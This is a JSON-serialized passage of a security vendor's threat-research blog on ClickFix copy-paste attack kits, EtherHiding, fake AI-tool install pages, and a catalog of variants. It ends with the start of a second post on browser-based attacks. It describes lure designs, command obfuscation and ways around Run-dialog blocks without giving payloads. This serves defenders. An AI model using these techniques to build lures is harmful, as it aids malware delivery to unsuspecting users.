with focus on healthcare. Halcyon documented ClickFix delivery across",[],{},{"nodeType":580,"data":1162,"content":1164},{"uri":1163},"https:\u002F\u002Fwww.halcyon.ai\u002Fransomware-research-reports\u002Fclipboard-to-encryption-the-critical-role-of-clickfix-in-ransomware-campaigns",[1165,1168],{"nodeType":448,"value":1126,"marks":1166,"data":1167},[],{},{"nodeType":448,"value":1169,"marks":1170,"data":1172},"four additional ransomware families",[1171],{"type":588},{},{"nodeType":448,"value":1174,"marks":1175,"data":1176},": Qilin, Termite, Interlock, and LeakNet.",[],{},{"nodeType":570,"data":1178,"content":1179},{},[1180],{"nodeType":455,"data":1181,"content":1182},{},[1183,1187,1199],{"nodeType":448,"value":1184,"marks":1185,"data":1186},"The",[],{},{"nodeType":580,"data":1188,"content":1190},{"uri":1189},"https:\u002F\u002Fcatchingphish.com\u002Fclickexfil-my-iteration-on-clickfix-and-filefix\u002F",[1191,1194],{"nodeType":448,"value":1126,"marks":1192,"data":1193},[],{},{"nodeType":448,"value":1195,"marks":1196,"data":1198},"ClickExfil PoC",[1197],{"type":588},{},{"nodeType":448,"value":1200,"marks":1201,"data":1202}," by security researchers demonstrates the use of ClickFix mechanics to exfiltrate files directly rather than deliver malware.",[],{},{"nodeType":499,"data":1204,"content":1208},{"target":1205},{"sys":1206},{"id":1207,"type":504,"linkType":505},"5xAW28WUJPNmfS6URpyQ2D",[],{"nodeType":515,"data":1210,"content":1211},{},[],{"nodeType":444,"data":1213,"content":1214},{},[1215],{"nodeType":448,"value":1216,"marks":1217,"data":1219},"Kit breakdown",[1218],{"type":452},{},{"nodeType":519,"data":1221,"content":1222},{},[1223],{"nodeType":448,"value":1224,"marks":1225,"data":1227},"ERRTRAFFIC",[1226],{"type":452},{},{"nodeType":455,"data":1229,"content":1230},{},[1231],{"nodeType":448,"value":1232,"marks":1233,"data":1234},"ERRTRAFFIC is a commercial Malware-as-a-Service platform priced at $300–380\u002Fmonth, with 11+ confirmed threat actor adopters. It injects itself into compromised websites — predominantly WordPress — and overlays an interchangeable lure picked from a library of faces at load time. Its v3 release upgraded to EtherHiding, reading kit configuration from smart contracts on Polygon via public RPC endpoints, so payload URLs can be rotated with a single blockchain transaction across every compromised site simultaneously. It serves both Windows and macOS instruction sets, adapting to the visitor's OS, and instructs via Win+X rather than Win+R.",[],{},{"nodeType":455,"data":1236,"content":1237},{},[1238,1243],{"nodeType":448,"value":1239,"marks":1240,"data":1242},"Example: ",[1241],{"type":452},{},{"nodeType":448,"value":1244,"marks":1245,"data":1246},"A fake Cloudflare \"Verifying you are human\" screen placed over a compromised site — one of several interchangeable faces this kit picks from at load, which also include a fake blue screen and a missing-font prompt. Step one is Win + X then I, which opens PowerShell or Terminal as administrator. It serves both Windows and macOS, and reads its configuration from a smart contract.",[],{},{"nodeType":499,"data":1248,"content":1252},{"target":1249},{"sys":1250},{"id":1251,"type":504,"linkType":505},"2rV1TMD3mlLU8eT0XfeHGW",[],{"nodeType":515,"data":1254,"content":1255},{},[],{"nodeType":519,"data":1257,"content":1258},{},[1259],{"nodeType":448,"value":1260,"marks":1261,"data":1263},"CLEARFAKE",[1262],{"type":452},{},{"nodeType":455,"data":1265,"content":1266},{},[1267,1271,1283],{"nodeType":448,"value":1268,"marks":1269,"data":1270},"CLEARFAKE is the oldest kit in the set,",[],{},{"nodeType":580,"data":1272,"content":1274},{"uri":1273},"https:\u002F\u002Fkrebsonsecurity.com\u002F2023\u002F10\u002Fthe-fake-browser-update-scam-gets-a-makeover\u002F",[1275,1278],{"nodeType":448,"value":1126,"marks":1276,"data":1277},[],{},{"nodeType":448,"value":1279,"marks":1280,"data":1282},"first identified by researcher Randy McEoin in July 2023",[1281],{"type":588},{},{"nodeType":448,"value":1284,"marks":1285,"data":1286}," — its name comes from the lack of obfuscation in its early JavaScript. It began as a straightforward fake browser update campaign but evolved substantially: by 2025 it had pivoted to ClickFix-style fake reCAPTCHA and Cloudflare Turnstile lures, andadopted  EtherHiding, storing entire payload JavaScript on-chain on the BNB Smart Chain rather than just a URL — so the malicious code is returned in full with no external hosting required.",[],{},{"nodeType":455,"data":1288,"content":1289},{},[1290,1294],{"nodeType":448,"value":1239,"marks":1291,"data":1293},[1292],{"type":452},{},{"nodeType":448,"value":1295,"marks":1296,"data":1297},"The example overlays a compromised publisher's article and blurs the page behind its panel, so the site looks like it is still loading. Its verification line is numeric rather than hex. It serves different instructions per OS, and it reads its configuration on-chain. The same URL served to a Mac gets a different instruction set — \"To better prove you are not a robot, please: Open Terminal…\" instead of the Run dialog. ",[],{},{"nodeType":499,"data":1299,"content":1303},{"target":1300},{"sys":1301},{"id":1302,"type":504,"linkType":505},"7eCIx7NOFvZJTA6mkfbU26",[],{"nodeType":519,"data":1305,"content":1306},{},[1307],{"nodeType":448,"value":1308,"marks":1309,"data":1311},"NOCHAIN",[1310],{"type":452},{},{"nodeType":455,"data":1313,"content":1314},{},[1315],{"nodeType":448,"value":1316,"marks":1317,"data":1318},"NOCHAIN is a fake CAPTCHA malicious copy and paste attack tool delivered from compromised websites. It leverages the EtherHiding technique for hosting its lure content and malicious payloads on a public blockchain. NOCHAIN also introduced an interesting browser-based persistence mechanism by registering a service worker that continues to deliver the payload to repeat visitors.",[],{},{"nodeType":455,"data":1320,"content":1321},{},[1322],{"nodeType":448,"value":1323,"marks":1324,"data":1325},"Visiting a site that has been compromised with NOCHAIN presents a fake clone of Google Search's \"unusual traffic from your computer network\" page with a reCAPTCHA checkbox. Upon clicking the checkbox, the payload is put onto the victim's clipboard and instructions for executing it via the Windows run dialog are displayed.",[],{},{"nodeType":499,"data":1327,"content":1331},{"target":1328},{"sys":1329},{"id":1330,"type":504,"linkType":505},"2DQzGhSAKZxQyyn4ICkyyp",[],{"nodeType":519,"data":1333,"content":1334},{},[1335],{"nodeType":448,"value":1336,"marks":1337,"data":1339},"TURNTIP",[1338],{"type":452},{},{"nodeType":455,"data":1341,"content":1342},{},[1343],{"nodeType":448,"value":1344,"marks":1345,"data":1346},"TURNTIP is a malicious copy and paste attack tool that is based on injecting a fake Cloudflare Turnstile interstitial into compromised sites. Push has observed active development of this tool throughout 2025 and 2026 with several distinct evolutions to the loader in particular.",[],{},{"nodeType":455,"data":1348,"content":1349},{},[1350],{"nodeType":448,"value":1351,"marks":1352,"data":1353},"Push named this threat after the distinctive help tooltip that's included in the execution prompt instructions to ensure that victims can find the Windows meta key to open the run dialog.",[],{},{"nodeType":499,"data":1355,"content":1359},{"target":1356},{"sys":1357},{"id":1358,"type":504,"linkType":505},"28g3nfKTW7us3YqvZ3chGC",[],{"nodeType":515,"data":1361,"content":1362},{},[],{"nodeType":444,"data":1364,"content":1365},{},[1366],{"nodeType":448,"value":1367,"marks":1368,"data":1370},"How Push can help",[1369],{"type":452},{},{"nodeType":455,"data":1372,"content":1373},{},[1374],{"nodeType":448,"value":1375,"marks":1376,"data":1377},"Push detects ClickFix attacks inside the browser before the payload reaches the endpoint. ",[],{},{"nodeType":566,"data":1379,"content":1380},{},[1381,1391],{"nodeType":570,"data":1382,"content":1383},{},[1384],{"nodeType":455,"data":1385,"content":1386},{},[1387],{"nodeType":448,"value":1388,"marks":1389,"data":1390},"Real-time page analysis identifies ClickFix kits on page load from their page structure and script behavior, independent of the attacker's infrastructure, so techniques like EtherHiding and domain rotation don't affect detection. ",[],{},{"nodeType":570,"data":1392,"content":1393},{},[1394],{"nodeType":455,"data":1395,"content":1396},{},[1397],{"nodeType":448,"value":1398,"marks":1399,"data":1400},"Malicious copy and paste detection fires on the clipboard event itself, catching the payload regardless of which LOLBin it invokes or how it's obfuscated — and covering every xFix derivative. ",[],{},{"nodeType":455,"data":1402,"content":1403},{},[1404],{"nodeType":448,"value":1405,"marks":1406,"data":1407},"Because Push operates at the browser layer, it intercepts ClickFix regardless of delivery mechanism, tackling attacks that arrive via search engines and compromised sites rather than email. This adds a powerful layer of protection in the browser that works alongside endpoint-layer controls, and is a flexible way of extending protection to machines that lack endpoint security controls such as BYOD devices, contractor machines, Macs, and developer machines.",[],{},{"nodeType":515,"data":1409,"content":1410},{},[],{"nodeType":444,"data":1412,"content":1413},{},[1414],{"nodeType":448,"value":1415,"marks":1416,"data":1418},"Appendix: Catalog of sub-techniques",[1417],{"type":452},{},{"nodeType":455,"data":1420,"content":1421},{},[1422],{"nodeType":448,"value":1423,"marks":1424,"data":1425},"Numerous ClickFix derivatives have emerged (many of which aren’t really fundamentally different enough to be given a whole new name) with varying lures, payloads, and deception tactics. For the majority, the core mechanics remain the same. ",[],{},{"nodeType":1427,"data":1428,"content":1429},"table",{},[1430,1457,1480,1503,1526,1549,1572,1595,1618,1641,1664,1687],{"nodeType":1431,"data":1432,"content":1433},"table-row",{},[1434,1446],{"nodeType":1435,"data":1436,"content":1437},"table-cell",{},[1438],{"nodeType":455,"data":1439,"content":1440},{},[1441],{"nodeType":448,"value":1442,"marks":1443,"data":1445},"Variant",[1444],{"type":452},{},{"nodeType":1435,"data":1447,"content":1448},{},[1449],{"nodeType":455,"data":1450,"content":1451},{},[1452],{"nodeType":448,"value":1453,"marks":1454,"data":1456},"Mechanic",[1455],{"type":452},{},{"nodeType":1431,"data":1458,"content":1459},{},[1460,1470],{"nodeType":1435,"data":1461,"content":1462},{},[1463],{"nodeType":455,"data":1464,"content":1465},{},[1466],{"nodeType":448,"value":1467,"marks":1468,"data":1469},"ClickFix",[],{},{"nodeType":1435,"data":1471,"content":1472},{},[1473],{"nodeType":455,"data":1474,"content":1475},{},[1476],{"nodeType":448,"value":1477,"marks":1478,"data":1479},"The original: fake error or CAPTCHA prompt tricks the user into opening Run (Win+R) or Terminal and pasting a clipboard-injected command. Remains the dominant in-the-wild technique.",[],{},{"nodeType":1431,"data":1481,"content":1482},{},[1483,1493],{"nodeType":1435,"data":1484,"content":1485},{},[1486],{"nodeType":455,"data":1487,"content":1488},{},[1489],{"nodeType":448,"value":1490,"marks":1491,"data":1492},"TerminalFix",[],{},{"nodeType":1435,"data":1494,"content":1495},{},[1496],{"nodeType":455,"data":1497,"content":1498},{},[1499],{"nodeType":448,"value":1500,"marks":1501,"data":1502},"Fake Cloudflare CAPTCHA on compromised sites instructs the user to open Windows Terminal (Win+X → I) instead of the Run dialog, deploying reverse tunnel backdoors for persistent network access. ",[],{},{"nodeType":1431,"data":1504,"content":1505},{},[1506,1516],{"nodeType":1435,"data":1507,"content":1508},{},[1509],{"nodeType":455,"data":1510,"content":1511},{},[1512],{"nodeType":448,"value":1513,"marks":1514,"data":1515},"CrashFix",[],{},{"nodeType":1435,"data":1517,"content":1518},{},[1519],{"nodeType":455,"data":1520,"content":1521},{},[1522],{"nodeType":448,"value":1523,"marks":1524,"data":1525},"Deliberately crashes or freezes the browser, then presents \"fix\" instructions that involve pasting a malicious command. Relies on urgency and the user's desire to recover their session. ",[],{},{"nodeType":1431,"data":1527,"content":1528},{},[1529,1539],{"nodeType":1435,"data":1530,"content":1531},{},[1532],{"nodeType":455,"data":1533,"content":1534},{},[1535],{"nodeType":448,"value":1536,"marks":1537,"data":1538},"ConsentFix",[],{},{"nodeType":1435,"data":1540,"content":1541},{},[1542],{"nodeType":455,"data":1543,"content":1544},{},[1545],{"nodeType":448,"value":1546,"marks":1547,"data":1548},"Abuses OAuth consent flows via ClickFix-style interaction — the user is walked through granting permissions to a malicious application under the guise of verification or troubleshooting. ",[],{},{"nodeType":1431,"data":1550,"content":1551},{},[1552,1562],{"nodeType":1435,"data":1553,"content":1554},{},[1555],{"nodeType":455,"data":1556,"content":1557},{},[1558],{"nodeType":448,"value":1559,"marks":1560,"data":1561},"ClickExfil",[],{},{"nodeType":1435,"data":1563,"content":1564},{},[1565],{"nodeType":455,"data":1566,"content":1567},{},[1568],{"nodeType":448,"value":1569,"marks":1570,"data":1571},"Uses browser fingerprinting for OS-specific instructions and targets high-value local files including OAuth tokens. Bypasses EDR controls not designed to detect user-initiated outbound transfers.",[],{},{"nodeType":1431,"data":1573,"content":1574},{},[1575,1585],{"nodeType":1435,"data":1576,"content":1577},{},[1578],{"nodeType":455,"data":1579,"content":1580},{},[1581],{"nodeType":448,"value":1582,"marks":1583,"data":1584},"InstallFix",[],{},{"nodeType":1435,"data":1586,"content":1587},{},[1588],{"nodeType":455,"data":1589,"content":1590},{},[1591],{"nodeType":448,"value":1592,"marks":1593,"data":1594},"Fake install guide — \"Install on Windows — Quick install via PowerShell\" — for developer tools and AI products. Distributed via malvertising, cloned docs, and shared LLM conversation URLs (the LLMshare delivery route). Push has detected this against Claude Code, NotebookLM, ChatGPT, and Codex branding.",[],{},{"nodeType":1431,"data":1596,"content":1597},{},[1598,1608],{"nodeType":1435,"data":1599,"content":1600},{},[1601],{"nodeType":455,"data":1602,"content":1603},{},[1604],{"nodeType":448,"value":1605,"marks":1606,"data":1607},"ClickLock (macOS)",[],{},{"nodeType":1435,"data":1609,"content":1610},{},[1611],{"nodeType":455,"data":1612,"content":1613},{},[1614],{"nodeType":448,"value":1615,"marks":1616,"data":1617},"Repeatedly force-kills applications until the user surrenders their login password to make it stop. Targets macOS specifically. ",[],{},{"nodeType":1431,"data":1619,"content":1620},{},[1621,1631],{"nodeType":1435,"data":1622,"content":1623},{},[1624],{"nodeType":455,"data":1625,"content":1626},{},[1627],{"nodeType":448,"value":1628,"marks":1629,"data":1630},"DragFix",[],{},{"nodeType":1435,"data":1632,"content":1633},{},[1634],{"nodeType":455,"data":1635,"content":1636},{},[1637],{"nodeType":448,"value":1638,"marks":1639,"data":1640},"Manipulates drag-and-drop interactions — the user drags what appears to be a normal UI element but is actually dropping a malicious file or payload into an execution context.",[],{},{"nodeType":1431,"data":1642,"content":1643},{},[1644,1654],{"nodeType":1435,"data":1645,"content":1646},{},[1647],{"nodeType":455,"data":1648,"content":1649},{},[1650],{"nodeType":448,"value":1651,"marks":1652,"data":1653},"FileFix",[],{},{"nodeType":1435,"data":1655,"content":1656},{},[1657],{"nodeType":455,"data":1658,"content":1659},{},[1660],{"nodeType":448,"value":1661,"marks":1662,"data":1663},"Abuses the File Explorer address bar — the user is instructed to paste a path or command into the address bar rather than the Run dialog, achieving execution through a less-monitored surface.",[],{},{"nodeType":1431,"data":1665,"content":1666},{},[1667,1677],{"nodeType":1435,"data":1668,"content":1669},{},[1670],{"nodeType":455,"data":1671,"content":1672},{},[1673],{"nodeType":448,"value":1674,"marks":1675,"data":1676},"DownloadFix",[],{},{"nodeType":1435,"data":1678,"content":1679},{},[1680],{"nodeType":455,"data":1681,"content":1682},{},[1683],{"nodeType":448,"value":1684,"marks":1685,"data":1686},"Tricks the user into downloading and executing a file directly (.exe\u002F.dmg) rather than using clipboard-paste-execute — ClickFix lure mechanics applied to a traditional download vector.",[],{},{"nodeType":1431,"data":1688,"content":1689},{},[1690,1700],{"nodeType":1435,"data":1691,"content":1692},{},[1693],{"nodeType":455,"data":1694,"content":1695},{},[1696],{"nodeType":448,"value":1697,"marks":1698,"data":1699},"Fake Update",[],{},{"nodeType":1435,"data":1701,"content":1702},{},[1703],{"nodeType":455,"data":1704,"content":1705},{},[1706],{"nodeType":448,"value":1707,"marks":1708,"data":1709},"The original SocGholish\u002FCLEARFAKE mechanic: a compromised site displays a fake browser or software update prompt. The user clicks through and either downloads a malicious installer or is redirected into a ClickFix clipboard-paste flow. ",[],{},{"nodeType":455,"data":1711,"content":1712},{},[1713],{"nodeType":448,"value":21,"marks":1714,"data":1715},[],{},{"entries":1717},{"hyperlink":1718,"inline":1719,"block":1720},[],[],[1721,1729,1744,1758,1772,1791,1818,1825,1833,1840,1847,1853,1871,1889,1895,1902,1908],{"sys":1722,"__typename":1723,"title":1724,"caption":1724,"layoutMode":60,"file":1725},{"id":503},"Image","Top trending ClickFix kits: ERRTRAFFIC, TURNTIP, NOCHAIN, and CLEARFAKE",{"url":1726,"width":1727,"height":1728},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F2Sih5PQLbqOVdULXAtCxhj\u002F45e16c6a1d3616d132c0775ff58a2252\u002Fimage12.png",1999,997,{"sys":1730,"__typename":1731,"content":1732,"name":1743,"title":60},{"id":694},"InsightTextBlockComponent",{"json":1733},{"data":1734,"content":1735,"nodeType":440},{},[1736],{"data":1737,"content":1738,"nodeType":455},{},[1739],{"data":1740,"marks":1741,"value":1742,"nodeType":448},{},[],"The standard EDR guidance for detecting LOLBin abuse is: baseline normal usage in your environment over 30 days, then alert on anomalies — unusual parent processes, command-line arguments, network connections from trusted binaries, and so on. The problem is that \"unusual\" varies enormously across environments. IT automation, software deployment, MDM tools, and admin scripts all generate legitimate LOLBin activity that looks suspicious out of context. The result is a high false-positive rate that requires significant per-environment tuning. And the set of binaries to monitor keeps growing.","ClickFix 2026 IB1",{"sys":1745,"__typename":1731,"content":1746,"name":1757,"title":60},{"id":725},{"json":1747},{"nodeType":440,"data":1748,"content":1749},{},[1750],{"nodeType":455,"data":1751,"content":1752},{},[1753],{"nodeType":448,"value":1754,"marks":1755,"data":1756},"Alongside base64, we also commonly see openssls base64 as a slight variation on this. Some include a legitimate command prefix, like the example above, and others incorporate small transforms using `rev`, `tr`, etc to defeat string matching against base64 payloads. ",[],{},"ClickFix 2026 IB2",{"sys":1759,"__typename":1731,"content":1760,"name":1771,"title":60},{"id":806},{"json":1761},{"nodeType":440,"data":1762,"content":1763},{},[1764],{"nodeType":455,"data":1765,"content":1766},{},[1767],{"nodeType":448,"value":1768,"marks":1769,"data":1770},"Incorporating carets and nested quotes has become increasingly more common to defeat binary string matching. Novel launchers continue to emerge, pclua being one of the recent additions.",[],{},"ClickFix 2026 IB3",{"sys":1773,"__typename":1731,"content":1774,"name":1790,"title":60},{"id":896},{"json":1775},{"nodeType":440,"data":1776,"content":1777},{},[1778],{"nodeType":455,"data":1779,"content":1780},{},[1781,1786],{"nodeType":448,"value":1782,"marks":1783,"data":1785},"Why this matters for defenders:",[1784],{"type":452},{},{"nodeType":448,"value":1787,"marks":1788,"data":1789}," EtherHiding is designed to get around solutions reliant on blocking attacker-controlled infrastructure — URL blocklists, domain reputation services, DNS filtering, and takedown-based disruption. The traditional kill chain has a domain or IP somewhere in the delivery path that defenders can block or request a takedown against; EtherHiding eliminates that by storing kit configuration in a smart contract that no hosting provider can be asked to remove. The payload URL can still be blocked, but the operator rotates it with a single transaction and every compromised site picks up the new one automatically. ",[],{},"ClickFix 2026 IB4",{"sys":1792,"__typename":1731,"content":1793,"name":1817,"title":60},{"id":917},{"json":1794},{"nodeType":440,"data":1795,"content":1796},{},[1797],{"nodeType":455,"data":1798,"content":1799},{},[1800,1804,1808,1813],{"nodeType":448,"value":1782,"marks":1801,"data":1803},[1802],{"type":452},{},{"nodeType":448,"value":1805,"marks":1806,"data":1807}," The standard ClickFix mitigation advice starts with blocking the Run dialog: \"Remove Run menu from Start Menu\" or \"Restrict Run dialog access\" (User Configuration → Administrative Templates → System) disables Win+R and the dialog itself. But for Win+X, there's no built-in GPO to disable the Power User menu or the keyboard shortcut. Even blocking both shortcuts doesn't block the applications behind them. The user — or the attacker's instructions — can reach the same shells through different routes: Start menu search, File Explorer address bar (type powershell and hit enter), Task Manager's \"Run new task,\" right-click context menu in any folder (Shift + right-click → \"Open PowerShell here\"), cmd → start powershell, or a desktop shortcut. ",[],{},{"nodeType":448,"value":1809,"marks":1810,"data":1812},"There are many paths to a shell on a modern OS, and the attacker only needs to pick one the defender hasn't closed. ",[1811],{"type":452},{},{"nodeType":448,"value":1814,"marks":1815,"data":1816},"\n",[],{},"ClickFix 2026 IB5",{"sys":1819,"__typename":1723,"title":1820,"caption":1820,"layoutMode":60,"file":1821},{"id":945},"Malvertising into a faked Claude Code install guide with malicious install commands (a clone of the legitimate page)",{"url":1822,"width":1823,"height":1824},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F2lyQA1II4e5idsJMXi3dWP\u002F0af02e5e2f9d7d560411aceb980ffc9a\u002FGroup_744.png",3943,1107,{"sys":1826,"__typename":1723,"title":1827,"caption":1828,"layoutMode":60,"file":1829},{"id":958},"A shared Claude.ai conversation containing malicious installation instructions.","A shared claude.ai conversation containing malicious installation instructions",{"url":1830,"width":1831,"height":1832},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F2YLf3kEK2y2XjdyM1Q9uRT\u002F6b5774de9708ff8544889305a094d991\u002Fimage6.png",1920,945,{"sys":1834,"__typename":1723,"title":1835,"caption":1836,"layoutMode":60,"file":1837},{"id":964},"A shared ChatGPT artefact styled to look like an error page, linking to a fake download page","A shared ChatGPT artefact styled to look like an error page, linking to a fake download page.",{"url":1838,"width":1727,"height":1839},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F5grmZOTXQcb1uDHhMw8e20\u002F239aece66c5f29745dd2a77fd288de49\u002Fimage1.png",875,{"sys":1841,"__typename":1723,"title":1842,"caption":1843,"layoutMode":60,"file":1844},{"id":977},"Fake Windows Update ClickFix lure accessed from a fake ChatGPT page","Fake Windows Update ClickFix lure accessed from a fake ChatGPT page.",{"url":1845,"width":1727,"height":1846},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F5t5VY2QhBgIkkVW8pORho8\u002Ff8883781178e3f9b7de99a69386a2c49\u002Fimage7.png",570,{"sys":1848,"__typename":1849,"title":1850,"arcadeDemoUrl":1851,"playText":1852},{"id":983},"ArcadeDemo","Fake Windows Update ClickFix Demo","https:\u002F\u002Fdemo.arcade.software\u002F3IgfcjkgYZjaltyESSO4?embed","2 mins",{"sys":1854,"__typename":1731,"content":1855,"name":1870,"title":60},{"id":1041},{"json":1856},{"data":1857,"content":1858,"nodeType":440},{},[1859],{"data":1860,"content":1861,"nodeType":455},{},[1862,1866],{"data":1863,"marks":1864,"value":1782,"nodeType":448},{},[1865],{"type":452},{"data":1867,"marks":1868,"value":1869,"nodeType":448},{},[]," These changes make it increasingly difficult for network-layer tools and automated page analysis tools to find and analyse malicious pages for malicious content, with homoglyph\u002Ffragmentation techniques defeating text-matching classifiers, and the anti-analysis measures defeating automated crawlers.","ClickFix 2026 IB6",{"sys":1872,"__typename":1731,"content":1873,"name":1888,"title":60},{"id":1207},{"json":1874},{"data":1875,"content":1876,"nodeType":440},{},[1877],{"data":1878,"content":1879,"nodeType":455},{},[1880,1884],{"data":1881,"marks":1882,"value":1782,"nodeType":448},{},[1883],{"type":452},{"data":1885,"marks":1886,"value":1887,"nodeType":448},{},[]," Endpoint detection and blocking remains a cat-and-mouse game where attackers are continuously searching for new ways to bypass or disable endpoint security tools and detection strategies. And ClickFix is arguably becoming even more dangerous as the range of actors and motives behind ClickFix continues to widen — from commodity infostealers to ransomware affiliates and state-sponsored operations.","ClickFix 2026 IB7",{"sys":1890,"__typename":1723,"title":1891,"caption":60,"layoutMode":60,"file":1892},{"id":1251},"ErrTraffic example",{"url":1893,"width":1727,"height":1894},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F5HBTdwpNReJArmNDXPl7vU\u002Fec1c72ceabe4402cee16543dbefd52ec\u002Fimage5.png",991,{"sys":1896,"__typename":1723,"title":1897,"caption":60,"layoutMode":60,"file":1898},{"id":1302},"CLEARFAKE examples with different payloads.",{"url":1899,"width":1900,"height":1901},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F6PE7UDEkuk5kEcdONZjxnm\u002Fd5cf878aa4271218983e24c61ae21117\u002FGroup_745.png",2582,1136,{"sys":1903,"__typename":1723,"title":1904,"caption":60,"layoutMode":60,"file":1905},{"id":1330},"NOCHAIN example",{"url":1906,"width":1727,"height":1907},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F6OAUICNN0ODZwC9bQzqQZh\u002Fc0abeb25b156cb5340379f66d3c8b6c4\u002Fimage6.png",548,{"sys":1909,"__typename":1723,"title":1910,"caption":60,"layoutMode":60,"file":1911},{"id":1358},"TURNTIP example",{"url":1912,"width":1727,"height":1913},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F7KDu0IsvfvhgtNtPHhLQ8F\u002Fd426b000471763514668bd13b010a35f\u002Fimage8.png",565,"json",{"items":1916},[],{},"The numbers behind ClickFix attacks in H2 2026","threat-research","2026-09-23T00:00:00.000Z",{"items":1922},[1923,2812,4123],{"__typename":1924,"sys":1925,"content":1927,"title":2794,"synopsis":2795,"hashTags":60,"publishedDate":2796,"slug":2797,"tagsCollection":2798,"authorsCollection":2808},"BlogPosts",{"id":1926},"62Zyr35VUmijkpupWk3hoD",{"json":1928},{"nodeType":440,"data":1929,"content":1930},{},[1931,1948,1955,1958,1966,1973,1980,2012,2018,2025,2032,2039,2042,2050,2057,2060,2068,2075,2081,2088,2094,2114,2121,2128,2135,2141,2144,2152,2159,2165,2196,2203,2219,2238,2245,2251,2254,2262,2281,2288,2311,2343,2378,2385,2391,2394,2402,2409,2415,2434,2441,2469,2500,2506,2509,2517,2524,2530,2549,2556,2604,2642,2649,2655,2658,2666,2673,2680,2706,2725,2731,2734,2742,2761,2768,2775],{"nodeType":455,"data":1932,"content":1933},{},[1934,1938,1944],{"nodeType":448,"value":1935,"marks":1936,"data":1937},"The view that \"the browser is the new endpoint\" and \"the new battleground for cyber attacks\" is becoming increasingly advocated by security leaders. But what does this ",[],{},{"nodeType":448,"value":1939,"marks":1940,"data":1943},"actually",[1941],{"type":1942},"italic",{},{"nodeType":448,"value":1945,"marks":1946,"data":1947}," mean for security teams? ",[],{},{"nodeType":455,"data":1949,"content":1950},{},[1951],{"nodeType":448,"value":1952,"marks":1953,"data":1954},"In this article, we’re cutting out the jargon to explore what a browser-based attack is, and what’s required for effective detection and response. ",[],{},{"nodeType":515,"data":1956,"content":1957},{},[],{"nodeType":444,"data":1959,"content":1960},{},[1961],{"nodeType":448,"value":1962,"marks":1963,"data":1965},"What is the goal of a browser-based attack?   ",[1964],{"type":452},{},{"nodeType":455,"data":1967,"content":1968},{},[1969],{"nodeType":448,"value":1970,"marks":1971,"data":1972},"First, it’s important to establish what the point of a browser-based attack is.",[],{},{"nodeType":455,"data":1974,"content":1975},{},[1976],{"nodeType":448,"value":1977,"marks":1978,"data":1979},"In most scenarios, attackers don’t think of themselves as attacking your web browser. Their end-goal is to compromise your business apps and data. That means going after the third-party apps and services that are now the backbone of business IT — and therefore the top target for attackers. ",[],{},{"nodeType":455,"data":1981,"content":1982},{},[1983,1987,1996,2000,2008],{"nodeType":448,"value":1984,"marks":1985,"data":1986},"The most common attack path today sees attackers log into third-party services, dump the data, and monetize it through extortion. You need only look at last year’s ",[],{},{"nodeType":580,"data":1988,"content":1990},{"uri":1989},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fsnowflake-retro",[1991],{"nodeType":448,"value":1992,"marks":1993,"data":1995},"Snowflake",[1994],{"type":588},{},{"nodeType":448,"value":1997,"marks":1998,"data":1999}," customer breaches that impacted 165+ organizations, or the still-ongoing ",[],{},{"nodeType":580,"data":2001,"content":2003},{"uri":2002},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fanalyzing-the-instructure-breach",[2004],{"nodeType":448,"value":2005,"marks":2006,"data":2007},"Salesforce attacks",[],{},{"nodeType":448,"value":2009,"marks":2010,"data":2011}," to see the scale of the problem. Identity weaknesses played a material role in almost 90% of Unit 42's investigations, and Google\u002FMandiant reported that identity issues were the initial access vector in 83% of cloud-related incidents.",[],{},{"nodeType":499,"data":2013,"content":2017},{"target":2014},{"sys":2015},{"id":2016,"type":504,"linkType":505},"5agrVXzEdwALmew2F5SPDp",[],{"nodeType":455,"data":2019,"content":2020},{},[2021],{"nodeType":448,"value":2022,"marks":2023,"data":2024},"The most logical way to do this is by targeting users of those apps. And because of the changes to working practices, your users are more accessible than ever to external attackers.",[],{},{"nodeType":455,"data":2026,"content":2027},{},[2028],{"nodeType":448,"value":2029,"marks":2030,"data":2031},"Once upon a time, email was the primary communication channel with the wider world, and work happened locally — on your device, and inside your locked-down network environment. This made email and the endpoint the highest priority from a security perspective. But now, with modern work happening across a network of decentralized internet apps, and more varied communication channels outside of email, it’s harder to stop users from interacting with malicious content (at least, without significantly impeding their ability to do their jobs).",[],{},{"nodeType":455,"data":2033,"content":2034},{},[2035],{"nodeType":448,"value":2036,"marks":2037,"data":2038},"Given that the browser is the place where business apps are accessed and used, it makes sense that attacks are increasingly playing out there too. ",[],{},{"nodeType":515,"data":2040,"content":2041},{},[],{"nodeType":444,"data":2043,"content":2044},{},[2045],{"nodeType":448,"value":2046,"marks":2047,"data":2049},"The 6 key browser-based attacks that security teams need to know about",[2048],{"type":452},{},{"nodeType":455,"data":2051,"content":2052},{},[2053],{"nodeType":448,"value":2054,"marks":2055,"data":2056},"Here's our breakdown of the top 6 browser-based attacks that should be on every security team's radar right now. Check out the videos for 101 explainers!",[],{},{"nodeType":515,"data":2058,"content":2059},{},[],{"nodeType":519,"data":2061,"content":2062},{},[2063],{"nodeType":448,"value":2064,"marks":2065,"data":2067},"1. Phishing for credentials and sessions",[2066],{"type":452},{},{"nodeType":455,"data":2069,"content":2070},{},[2071],{"nodeType":448,"value":2072,"marks":2073,"data":2074},"The most direct way for an attacker to compromise a business application is to phish a user of that app. You might not necessarily think of phishing as a browser-based attack, but that’s exactly what it is today. ",[],{},{"nodeType":499,"data":2076,"content":2080},{"target":2077},{"sys":2078},{"id":2079,"type":504,"linkType":505},"6wn81JTcqktmJSSFfTzNSc",[],{"nodeType":455,"data":2082,"content":2083},{},[2084],{"nodeType":448,"value":2085,"marks":2086,"data":2087},"Phishing tooling and infrastructure has evolved a lot in the past decade, while the changes to business IT means there are both many more vectors for phishing attack delivery, and apps and identities to target. Attackers can deliver links over instant messenger apps, social media, SMS, malicious ads, 